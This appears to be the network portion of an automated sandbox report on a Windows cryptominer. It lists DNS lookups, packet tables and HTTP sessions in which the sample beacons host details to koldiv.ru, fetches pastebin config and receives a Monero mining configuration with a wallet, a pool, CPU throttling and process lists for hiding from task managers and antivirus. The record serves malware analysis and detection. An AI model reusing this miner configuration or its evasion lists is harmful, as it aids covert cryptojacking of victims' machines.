                                                                  Jul 22, 2024 15:45:09.093856096 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:09.093898058 CEST44349707104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:09.094001055 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:09.106396914 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:09.106415987 CEST44349707104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:09.650379896 CEST44349707104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:09.651596069 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:09.651621103 CEST44349707104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:09.654603004 CEST44349707104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:09.654678106 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:09.656327963 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:09.656390905 CEST44349707104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:09.656454086 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:09.656461954 CEST44349707104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:09.707958937 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:10.215776920 CEST44349707104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:10.215890884 CEST44349707104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:10.215985060 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:10.223720074 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:10.223763943 CEST44349707104.20.4.235192.168.2.5
                                                                  Jul 22, 2024 15:45:10.223809004 CEST49707443192.168.2.5104.20.4.235
                                                                  Jul 22, 2024 15:45:10.278795958 CEST4970880192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:10.285995007 CEST804970877.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:10.286158085 CEST4970880192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:10.286242962 CEST4970880192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:10.291352987 CEST804970877.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:10.291414022 CEST4970880192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:10.296669960 CEST804970877.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:11.088618040 CEST804970877.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:11.088905096 CEST4970880192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:11.092195988 CEST804970877.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:11.092315912 CEST4970880192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:45:11.100336075 CEST804970877.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:45:11.118397951 CEST4970412222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:11.129925013 CEST1222249704162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:16.192920923 CEST4971412222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:16.571672916 CEST1222249714162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:16.571774006 CEST4971412222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:16.572181940 CEST4971412222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:16.576965094 CEST1222249714162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:18.252007008 CEST1222249714162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:18.252114058 CEST4971412222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:18.252197981 CEST4971412222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:18.262015104 CEST1222249714162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:23.270973921 CEST4971512222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:23.276290894 CEST1222249715162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:23.276384115 CEST4971512222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:23.282444954 CEST4971512222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:23.287345886 CEST1222249715162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:24.991748095 CEST1222249715162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:24.991997957 CEST4971512222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:24.992090940 CEST4971512222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:24.997549057 CEST1222249715162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:30.349236965 CEST4971612222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:30.355202913 CEST1222249716162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:30.355410099 CEST4971612222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:30.360763073 CEST4971612222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:30.365717888 CEST1222249716162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:32.096410036 CEST1222249716162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:32.096623898 CEST4971612222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:32.096729040 CEST4971612222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:32.102621078 CEST1222249716162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:37.490607977 CEST4971712222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:37.495556116 CEST1222249717162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:37.495630026 CEST4971712222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:37.495871067 CEST4971712222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:37.505319118 CEST1222249717162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:39.198666096 CEST1222249717162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:39.204288006 CEST4971712222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:39.204394102 CEST4971712222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:39.209250927 CEST1222249717162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:44.555110931 CEST4971812222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:44.560246944 CEST1222249718162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:44.560590029 CEST4971812222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:44.569441080 CEST4971812222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:44.574475050 CEST1222249718162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:46.305737019 CEST1222249718162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:46.305830002 CEST4971812222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:46.334847927 CEST4971812222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:46.339806080 CEST1222249718162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:51.630517006 CEST4971912222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:51.635719061 CEST1222249719162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:51.635898113 CEST4971912222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:51.636220932 CEST4971912222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:51.641834974 CEST1222249719162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:53.605153084 CEST1222249719162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:53.607256889 CEST1222249719162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:53.607364893 CEST4971912222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:53.607481956 CEST4971912222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:53.613910913 CEST1222249719162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:58.693212986 CEST4972112222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:58.699029922 CEST1222249721162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:45:58.699129105 CEST4972112222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:58.705199003 CEST4972112222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:45:58.732285976 CEST1222249721162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:46:00.671331882 CEST1222249721162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:46:00.671478987 CEST4972112222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:46:00.671572924 CEST4972112222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:46:00.671821117 CEST1222249721162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:46:00.671885014 CEST4972112222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:46:00.676615000 CEST1222249721162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:46:05.770914078 CEST4972212222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:46:05.776046991 CEST1222249722162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:46:05.776130915 CEST4972212222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:46:05.785095930 CEST4972380192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:46:05.789989948 CEST804972377.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:46:05.792300940 CEST4972380192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:46:05.801727057 CEST4972380192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:46:05.808325052 CEST804972377.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:46:05.808376074 CEST4972380192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:46:05.814193964 CEST804972377.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:46:06.695324898 CEST804972377.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:46:06.695597887 CEST804972377.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:46:06.695614100 CEST804972377.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:46:06.695664883 CEST4972380192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:46:06.695708990 CEST4972380192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:46:06.696381092 CEST804972377.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:46:06.696405888 CEST4972212222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:46:06.696428061 CEST4972380192.168.2.577.222.57.251
                                                                  Jul 22, 2024 15:46:06.707659960 CEST804972377.222.57.251192.168.2.5
                                                                  Jul 22, 2024 15:46:06.711823940 CEST1222249722162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:46:06.737633944 CEST1222249722162.19.139.184192.168.2.5
                                                                  Jul 22, 2024 15:46:06.737854958 CEST4972212222192.168.2.5162.19.139.184
                                                                  Jul 22, 2024 15:46:06.738567114 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:06.738611937 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:06.738817930 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:06.739300966 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:06.739314079 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.013176918 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.036240101 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:08.036273003 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.037463903 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.037539005 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:08.039031029 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:08.039155006 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.084229946 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:08.084253073 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.132241964 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:08.236984968 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.286140919 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:52.627979994 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:52.668500900 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:52.898170948 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:52.942261934 CEST49724443192.168.2.5141.94.96.195

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 22, 2024 15:45:05.821445942 CEST5294353192.168.2.51.1.1.1
                                                                  Jul 22, 2024 15:45:05.831835032 CEST53529431.1.1.1192.168.2.5
                                                                  Jul 22, 2024 15:45:06.856748104 CEST6266853192.168.2.51.1.1.1
                                                                  Jul 22, 2024 15:45:06.996658087 CEST53626681.1.1.1192.168.2.5
                                                                  Jul 22, 2024 15:45:07.821969032 CEST6546653192.168.2.51.1.1.1
                                                                  Jul 22, 2024 15:45:07.830107927 CEST53654661.1.1.1192.168.2.5
                                                                  Jul 22, 2024 15:46:06.697997093 CEST6097153192.168.2.51.1.1.1
                                                                  Jul 22, 2024 15:46:06.737618923 CEST53609711.1.1.1192.168.2.5

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jul 22, 2024 15:45:05.821445942 CEST192.168.2.51.1.1.10xb153Standard query (0)xmr.2miners.comA (IP address)IN (0x0001)false
                                                                  Jul 22, 2024 15:45:06.856748104 CEST192.168.2.51.1.1.10x9691Standard query (0)koldiv.ruA (IP address)IN (0x0001)false
                                                                  Jul 22, 2024 15:45:07.821969032 CEST192.168.2.51.1.1.10x2373Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                  Jul 22, 2024 15:46:06.697997093 CEST192.168.2.51.1.1.10x417eStandard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jul 22, 2024 15:45:05.831835032 CEST1.1.1.1192.168.2.50xb153No error (0)xmr.2miners.com162.19.139.184A (IP address)IN (0x0001)false
                                                                  Jul 22, 2024 15:45:06.996658087 CEST1.1.1.1192.168.2.50x9691No error (0)koldiv.ru77.222.57.251A (IP address)IN (0x0001)false
                                                                  Jul 22, 2024 15:45:07.830107927 CEST1.1.1.1192.168.2.50x2373No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                  Jul 22, 2024 15:45:07.830107927 CEST1.1.1.1192.168.2.50x2373No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                  Jul 22, 2024 15:45:07.830107927 CEST1.1.1.1192.168.2.50x2373No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                  Jul 22, 2024 15:46:06.737618923 CEST1.1.1.1192.168.2.50x417eNo error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jul 22, 2024 15:46:06.737618923 CEST1.1.1.1192.168.2.50x417eNo error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                                                  Jul 22, 2024 15:46:06.737618923 CEST1.1.1.1192.168.2.50x417eNo error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                                                  Jul 22, 2024 15:46:06.737618923 CEST1.1.1.1192.168.2.50x417eNo error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • pastebin.com
                                                                  • koldiv.ru

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.54970577.222.57.251805596C:\Windows\System32\conhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jul 22, 2024 15:45:07.006606102 CEST115OUTGET /http://koldiv.ru HTTP/1.1
                                                                  Accept: */*
                                                                  Connection: close
                                                                  Host: koldiv.ru
                                                                  User-Agent: cpp-httplib/0.12.6
                                                                  Jul 22, 2024 15:45:07.820501089 CEST1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.25.4
                                                                  Date: Mon, 22 Jul 2024 13:45:07 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Vary: accept-language,accept-charset
                                                                  Accept-Ranges: bytes
                                                                  Content-Language: en
                                                                  Data Raw: 34 30 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 6b 6f 6c 64 69 76 2e 72 75 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                  Data Ascii: 40b<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:webmaster@koldiv.ru" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Object not found!</h1><p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="mailto:webmaster@koldiv.ru">webmaster</a>.</p><h2>Error 404</h2><address> <a href="/">koldiv.ru</a><br /> <span>Mon Jul 22 16:45
                                                                  Jul 22, 2024 15:45:07.821124077 CEST93INData Raw: 3a 30 37 20 32 30 32 34 3c 62 72 20 2f 3e 0a 20 20 41 70 61 63 68 65 2f 32 2e 32 2e 32 39 20 28 47 65 6e 74 6f 6f 29 20 50 48 50 2f 37 2e 31 2e 33 33 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d
                                                                  Data Ascii: :07 2024<br /> Apache/2.2.29 (Gentoo) PHP/7.1.33</span></address></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.54970877.222.57.251805596C:\Windows\System32\conhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jul 22, 2024 15:45:10.286242962 CEST169OUTPOST /api/endpoint.php HTTP/1.1
                                                                  Accept: */*
                                                                  Connection: close
                                                                  Content-Length: 366
                                                                  Content-Type: application/json
                                                                  Host: koldiv.ru
                                                                  User-Agent: cpp-httplib/0.12.6
                                                                  Jul 22, 2024 15:45:10.291414022 CEST366OUTData Raw: 7b 22 69 64 22 3a 22 76 61 7a 61 73 78 61 72 6c 70 6b 6e 66 78 72 77 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 37 32 31 36 38 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 38 56 46 44 4e 53
                                                                  Data Ascii: {"id":"vazasxarlpknfxrw","computername":"721680","username":"SYSTEM","gpu":"8VFDNSMY","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"http://koldiv.ru,https://pastebin.com/raw/HpN5DV4T,htt
                                                                  Jul 22, 2024 15:45:11.088618040 CEST233INHTTP/1.1 200 OK
                                                                  Server: nginx/1.25.4
                                                                  Date: Mon, 22 Jul 2024 13:45:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 17
                                                                  Connection: close
                                                                  X-Robots-Tag: noindex, nofollow
                                                                  X-Powered-By: PHP/7.1.33
                                                                  Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d
                                                                  Data Ascii: {"response":"ok"}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.54972377.222.57.251805596C:\Windows\System32\conhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jul 22, 2024 15:46:05.801727057 CEST169OUTPOST /api/endpoint.php HTTP/1.1
                                                                  Accept: */*
                                                                  Connection: close
                                                                  Content-Length: 367
                                                                  Content-Type: application/json
                                                                  Host: koldiv.ru
                                                                  User-Agent: cpp-httplib/0.12.6
                                                                  Jul 22, 2024 15:46:05.808376074 CEST367OUTData Raw: 7b 22 69 64 22 3a 22 76 61 7a 61 73 78 61 72 6c 70 6b 6e 66 78 72 77 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 37 32 31 36 38 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 38 56 46 44 4e 53
                                                                  Data Ascii: {"id":"vazasxarlpknfxrw","computername":"721680","username":"SYSTEM","gpu":"8VFDNSMY","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"http://koldiv.ru,https://pastebin.com/raw/HpN5DV4T,htt
                                                                  Jul 22, 2024 15:46:06.695324898 CEST1236INHTTP/1.1 200 OK
                                                                  Server: nginx/1.25.4
                                                                  Date: Mon, 22 Jul 2024 13:46:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 2750
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  X-Robots-Tag: noindex, nofollow
                                                                  X-Powered-By: PHP/7.1.33
                                                                  Data Raw: 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 70 6f 6f 6c 2e 73 75 70 70 6f 72 74 78 6d 72 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 38 37 6f 77 59 77 4d 56 75 48 53 69 38 79 5a 50 57 34 55 67 43 72 51 76 61 62 36 78 6b 70 46 69 55 58 32 75 43 31 52 4d 78 54 47 31 44 4a 75 6b 42 55 57 70 59 31 58 44 6b 72 31 68 62 4a 4d 59 41 59 5a 78 31 52 59 64 41 4c 47 73 47 66 36 43 44 74 41 6f 67 7a 67 56 35 41 6a 50 62 77 78 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 33 34 32 33 31 35 35 36 34 33 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 65 2c 0d 0a 20 20 20 20 22 6d 61 78 2d 63 70 75 22 3a 20 32 30 2c 0d 0a 20 20 20 20 22 69 64 6c 65 2d 77 61 69 74 22 3a 20 35 2c 0d 0a 20 20 20 20 22 69 64 6c 65 2d 63 70 75 22 3a 20 39 30 2c 0d 0a 20 20 20 20 22 73 74 65 [TRUNCATED]
                                                                  Data Ascii: { "algo": "rx/0", "pool": "pool.supportxmr.com", "port": 443, "wallet": "87owYwMVuHSi8yZPW4UgCrQvab6xkpFiUX2uC1RMxTG1DJukBUWpY1XDkr1hbJMYAYZx1RYdALGsGf6CDtAogzgV5AjPbwx", "password": "3423155643", "nicehash": false, "ssltls": true, "max-cpu": 20, "idle-wait": 5, "idle-cpu": 90, "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,
                                                                  Jul 22, 2024 15:46:06.695597887 CEST1236INData Raw: 65 6e 6c 69 73 74 65 64 2e 65 78 65 2c 57 6f 72 6c 64 4f 66 54 61 6e 6b 73 2e 65 78 65 2c 53 6f 54 47 61 6d 65 2e 65 78 65 2c 46 69 76 65 4d 5f 62 32 31 38 39 5f 47 54 41 50 72 6f 63 65 73 73 2e 65 78 65 2c 4e 61 72 61 6b 61 42 6c 61 64 65 70 6f
                                                                  Data Ascii: enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus
                                                                  Jul 22, 2024 15:46:06.695614100 CEST519INData Raw: 65 2c 20 61 76 6b 77 63 74 6c 2e 65 78 65 2c 20 66 73 61 76 33 32 2e 65 78 65 2c 20 6d 63 73 68 69 65 6c 64 2e 65 78 65 2c 20 6e 74 72 74 73 63 61 6e 2e 65 78 65 2c 20 61 76 67 75 61 72 64 2e 65 78 65 2c 20 61 73 68 53 65 72 76 2e 65 78 65 2c 20
                                                                  Data Ascii: e, avkwctl.exe, fsav32.exe, mcshield.exe, ntrtscan.exe, avguard.exe, ashServ.exe, AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,f


                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549706104.20.4.2354435596C:\Windows\System32\conhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-07-22 13:45:08 UTC114OUTGET /raw/HpN5DV4T HTTP/1.1
                                                                  Accept: */*
                                                                  Connection: close
                                                                  Host: pastebin.com
                                                                  User-Agent: cpp-httplib/0.12.6
                                                                  2024-07-22 13:45:09 UTC391INHTTP/1.1 200 OK
                                                                  Date: Mon, 22 Jul 2024 13:45:08 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  x-frame-options: DENY
                                                                  x-content-type-options: nosniff
                                                                  x-xss-protection: 1;mode=block
                                                                  cache-control: public, max-age=1801
                                                                  CF-Cache-Status: EXPIRED
                                                                  Last-Modified: Sat, 20 Jul 2024 16:54:30 GMT
                                                                  Server: cloudflare
                                                                  CF-RAY: 8a73de937de74401-EWR
                                                                  2024-07-22 13:45:09 UTC7INData Raw: 32 0d 0a 31 32 0d 0a
                                                                  Data Ascii: 212
                                                                  2024-07-22 13:45:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.549707104.20.4.2354435596C:\Windows\System32\conhost.exe
                                                                  TimestampBytes transferredDirectionData
